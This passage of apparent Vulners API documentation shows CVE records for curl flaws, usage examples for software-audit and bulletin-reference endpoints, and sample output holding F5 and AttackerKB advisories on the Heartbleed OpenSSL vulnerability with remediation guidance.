                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-27534",
            "cvelist": [
                "CVE-2023-27534"
            ],
            "lastseen": "2024-06-14T10:22:21",
            "cpe": [
                "cpe:/a:haxx:curl::::"
            ],
            "cpe23": [
                "cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:*"
            ],
            "cwe": [
                "CWE-22"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.88.1",
                    "operator": "le",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 8.8,
                "uncertanity": 0.1,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-38039",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-38039",
            "description": "When curl retrieves an HTTP response, it stores the incoming headers so that\nthey can be accessed later via the libcurl headers API.\n\nHowever, curl did not have a limit in how many or how large headers it would\naccept in a response, allowing a malicious server to stream an endless series\nof headers and eventually cause curl to run out of heap memory.",
            "published": "2023-09-15T04:15:10",
            "modified": "2024-04-01T15:45:33",
            "cvss": {
                "score": 7.5,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                    "baseScore": 7.5,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "NONE",
                    "integrityImpact": "NONE",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-38039",
            "cvelist": [
                "CVE-2023-38039"
            ],
            "lastseen": "2024-06-14T11:28:36",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-770"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "8.3.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 7.5,
                "uncertanity": 0.2,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-46218",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-46218",
            "description": "This flaw allows a malicious HTTP server to set \"super cookies\" in curl that\nare then passed back to more origins than what is otherwise allowed or\npossible. This allows a site to set cookies that then would get sent to\ndifferent and unrelated sites and domains.\n\nIt could do this by exploiting a mixed case flaw in curl's function that\nverifies a given cookie domain against the Public Suffix List (PSL). For\nexample a cookie could be set with `domain=co.UK` when the URL used a lower\ncase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.\n",
            "published": "2023-12-07T01:15:07",
            "modified": "2024-01-25T14:15:26",
            "cvss": {
                "score": 6.5,
                "severity": "MEDIUM",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                    "baseScore": 6.5,
                    "baseSeverity": "MEDIUM",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "LOW",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-46218",
            "cvelist": [
                "CVE-2023-46218"
            ],
            "lastseen": "2024-06-14T11:26:11",
            "cpe": [
                "cpe:/a:haxx:curl::::"
            ],
            "cpe23": [
                "cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:*"
            ],
            "cwe": [],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "8.4.0",
                    "operator": "le",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 6.6,
                "uncertanity": 0.3,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-46219",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-46219",
            "description": "When saving HSTS data to an excessively long file name, curl could end up\nremoving all contents, making subsequent requests using that file unaware of\nthe HSTS status they should otherwise use.\n",
            "published": "2023-12-12T02:15:06",
            "modified": "2024-01-19T16:15:09",
            "cvss": {
                "score": 5.3,
                "severity": "MEDIUM",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                    "baseScore": 5.3,
                    "baseSeverity": "MEDIUM",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "NONE",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-46219",
            "cvelist": [
                "CVE-2023-46219"
            ],
            "lastseen": "2024-06-14T10:21:39",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-311"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "8.5.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 5.7,
                "uncertanity": 0.6,
                "vector": "NONE"
            }
        }
    ]
]

Software Audit

This feature allows to analyze software name/version pairs for CVEs.

Required parameters:

  • os (str): Operating system name
  • version (str): Operating system version
  • packages (list): List of dictionaries containing software and version information
  • apiKey: Activated API key

Query:

POST /api/v3/burp/packages/

Query example:

curl -X POST 'https://vulners.com/api/v3/burp/packages/' \
     -H 'Content-Type: application/json' \
     -d '{
     "os": "Ubuntu",
     "osVersion": "22.04",
     "packages": [{"software": "Mozilla Firefox", "version": "80.0.1"}],
     "apiKey": "{API key}"
     }'

packages = vulners_api.software_audit(
    os='Ubuntu', 
    version='22.04', 
    packages=[{'software': 'Mozilla Firefox', 'version': '80.0.1'}]
)
{
    "result": "OK",
    "data": {
        "vulnerabilities": [
            {
                "id": [
                    "CVE-2021-23987",
                    ...
                ],
                "package": "mozilla firefox",
                "version": "80.0.1"
            }
        ]
    }
}

Get references for the vulnerability

Get all bulletins by identifier.

Required parameters:

  • id (str): document id
  • references: True or False
  • apiKey: Activated API key

Query:

POST /api/v3/search/id/

Query example:

curl -POST --compressed https://vulners.com/api/v3/search/id/ -H 'Content-Type: application/json' -d '{
"id": "CVE-2014-0160", 
"fields": [
    "id",
    "title",
    "description",
    "type",
    "bulletinFamily",
    "cvss",
    "published",
    "modified",
    "lastseen",
    "href",
    "sourceHref",
    "sourceData",
    "cvelist"],
"references": "True",
"apiKey": "{API key}"}'

references = vulners_api.get_bulletin_references("CVE-2014-0160")
{
    "f5": [
        {
            "lastseen": "2020-04-06T22:39:36",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** &gt; **Identified** &gt; **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature  \n---|---|---|---  \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1  \n10.0.0 - 10.2.4 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.4.0 - 11.4.1 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.3.0 - 11.4.1 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1  \n10.1.0 - 10.2.4 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1  \n10.0.0 - 10.2.4 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0  \n10.1.0 - 10.2.4 | None  \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1  \n10.0.0 - 10.2.4 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0  \n11.5.2  \n11.5.1 HF1 - HF2  \n11.5.0 HF2 - HF3  \n11.0.0 - 11.4.1  \n10.0.0 - 10.2.4 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility  \nbig3d  \nCOMPAT SSL ciphers  \nBIG-IP PSM | None | 11.0.0 - 11.4.1  \n10.0.0 - 10.2.4 | None  \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0  \n10.0.0 - 10.2.4 | None  \nBIG-IP WOM | None | 11.0.0 - 11.3.0  \n10.0.0 - 10.2.4 | None  \nARX | None | 6.0.0 - 6.4.0 | None  \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1  \n2.1.0 - 2.3.0 | big3d  \nFirePass | None | 7.0.0  \n6.0.0 - 6.1.0 | None  \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None  \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None  \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None  \nFirePass Clients | None | 5520-6032 | None  \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None  \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None  \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None  \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1  \n1.0.5 - 1.0.6 | 2.0.2  \n1.0.0 - 1.0.4 | VPN  \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.*  \n7090.* - 7090.2014.407.*  \n7091.* - 7091.2014.408.*  \n7100.* - 7100.2014.408.*  \n7101.* - 7101.2014.407.* | 6035 - 7071  \n7080.2014.409.*  \n7090.2014.408.*  \n7091.2014.409.*  \n7100.2014.409.* (11.5.0 HF3)  \n7101.2014.408.* (11.5.1 HF2) | VPN  \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.*  \n7090.* - 7090.2014.407.*  \n7091.* - 7091.2014.408.*  \n7100.* - 7100.2014.408.*  \n7101.* - 7101.2014.407.* | 6035 - 7071  \n7080.2014.409.*  \n7090.2014.408.*  \n7091.2014.409.*  \n7100.2014.409.* (11.5.0 HF3)  \n7101.2014.408.* (11.5.1 HF2) | VPN  \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.*  \n7090.* - 7090.2014.407.*  \n7091.* - 7091.2014.408.*  \n7100.* - 7100.2014.408.*  \n7101.* - 7101.2014.407.* | 6035 - 7071  \n7080.2014.409.*  \n7090.2014.408.*  \n7091.2014.409.*  \n7100.2014.409.* (11.5.0 HF3)  \n7101.2014.408.* (11.5.1 HF2) | VPN  \nLineRate | None | 2.2.0 | None  \n  \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n  * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n  * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n  * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n  * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n  * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n  1. Log in to the Configuration utility.\n  2. Navigate to **Device Management **&gt; **Device Trust** &gt; **Local Domain**.\n  3. Click **Reset Device Trust**.\n  4. Select the **Generate new self-signed authority** option.\n  5. Click **Update** (or **Next**).\n  6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n  * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n  * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n  * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n  * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n  * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n  * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n  * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n  * big3d version 11.5.0.0.0.221 for Linux        \n  * big3d version 11.5.0.1.0.227 for Linux    \n  * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n  * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n  * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n  * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n  * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n    * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n    * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n    * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n  * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n  * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n  * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n  * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n  * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n  * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n  * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n  * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n  * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n  * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n  * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n  * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n  * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n  * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n",
            "edition": 1,
            "modified": "2019-07-30T19:46:00",
            "published": "2015-02-17T01:30:00",
            "id": "F5:K15159",
            "href": "https://support.f5.com/csp/article/K15159",
            "title": "OpenSSL vulnerability CVE-2014-0160",
            "type": "f5",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        },
        {
            "lastseen": "2016-09-26T17:23:23",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "edition": 1,
            "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes**  \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n  * SOL14620: Managing SSL certificates for BIG-IP systems\n  * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x)   \n\n  * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n  * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n  * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n  1. Log in to the Configuration utility.\n  2. Navigate to **Device Management **&gt; **Device Trust** &gt; **Local Domain**.\n  3. Click **Reset Device Trust**.\n  4. Select the **Generate new self-signed authority** option.\n  5. Click **Update** (or **Next**).\n  6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.  \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n  * SOL13649: Creating a device group using the Configuration utility\n  * SOL13639: Creating a device group using the Traffic Management Shell\n  * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process  \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n  * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n  * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n  * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n  * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n  * big3d version 11.5.0.0.0.221 for Linux   \n\n  * big3d version 11.5.0.1.0.227 for Linux   \n\n  * big3d version 11.5.1.0.0.110 for Linux  \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n  * SOL13703: Overview of big3d version management  \n\n\nBIG-IP maintenance and user passwords  \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n  * SOL13121: Changing system maintenance account passwords (11.x)\n  * BIG-IP TMOS: Concepts guide  \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations:  \n\n\n  * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n  * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles:  \n  \n\n    * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n    * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n    * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n  * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n  * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n  * <http://heartbleed.com/>  \n  \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n  * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n  * SOL14783: Overview of the Client SSL profile (11.x)\n  * SOL12463: Overview of F5 Edge products\n  * SOL13757: BIG-IP Edge Client version matrix\n  * SOL9970: Subscribing to email notifications regarding F5 products\n  * SOL9957: Creating a custom RSS feed to view new and updated documents\n  * SOL4602: Overview of the F5 security vulnerability response policy\n  * SOL4918: Overview of the F5 critical issue hotfix policy\n  * SOL167: Downloading software and firmware from F5\n  * SOL13123: Managing BIG-IP product hotfixes (11.x)\n  * SOL10025: Managing BIG-IP product hotfixes (10.x)\n  * SOL9502: BIG-IP hotfix matrix\n  * SOL10322: FirePass hotfix matrix\n",
            "modified": "2015-02-16T00:00:00",
            "published": "2014-04-08T00:00:00",
            "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html",
            "id": "SOL15159",
            "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160",
            "type": "f5",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        }
    ],
    "attackerkb": [
        {
            "lastseen": "2020-11-18T06:44:13",
            "bulletinFamily": "info",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n  \n**Recent assessments:**  \n  \n**zeroSteiner** at April 13, 2020 8:54pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4  \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:14pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the 